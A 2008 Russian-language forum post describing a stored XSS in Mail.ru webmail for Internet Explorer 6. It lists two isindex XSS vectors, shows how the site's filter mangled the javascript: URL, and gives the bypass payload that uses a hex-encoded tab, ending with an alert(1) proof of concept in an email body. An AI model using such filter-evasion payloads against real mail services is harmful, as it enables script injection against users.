| brain[pillow] |
10.11.2008 00:04 |
Активная XSS Mail.ru (IE6) / 09.11.08
Недавно рылся по секьюрити блогам, и нашёл вот такой вот интересный пост с двумя XSS-конструкциями для браузера IE (http://www.thespanner.co.uk/2008/08/26/new-xss-vector/):
Код:
1) <isindex type=image src=1 onerror=alert(1)>
2) <isindex action=javascript:alert(1) type=image>
Первая конструкция работает под все версии IE, но на mail.ru тщательно фильтруется активное содержимое любых тегов, поэтому вариант с onload/onerror я отбросил исходя из прошлого горького опыта.
А вот вторая XSS выглядела немного более многообещающей. Заюзав её в неизменном виде на почте mail.ru я получил вот что:
Код:
<isindex action=xjavascript:alert(1) type=image>
Через 5 минут этот фильтр обошёлся добавлением загнанной в hex табуляции (	). Фильтр сделал с этим вариантом следующее:
Код:
<isindex action=	javascript:alert(1) type=image>
А это дело корректно обрабатывается в ослике, поэтому на данный момент мы имеем активную XSS в теле письма для IE 6.0:
Код:
<isindex action=	javascript:alert(1) type=image>
Пасиба за внимание, надеюсь, кому-нибудь пригодится :) |
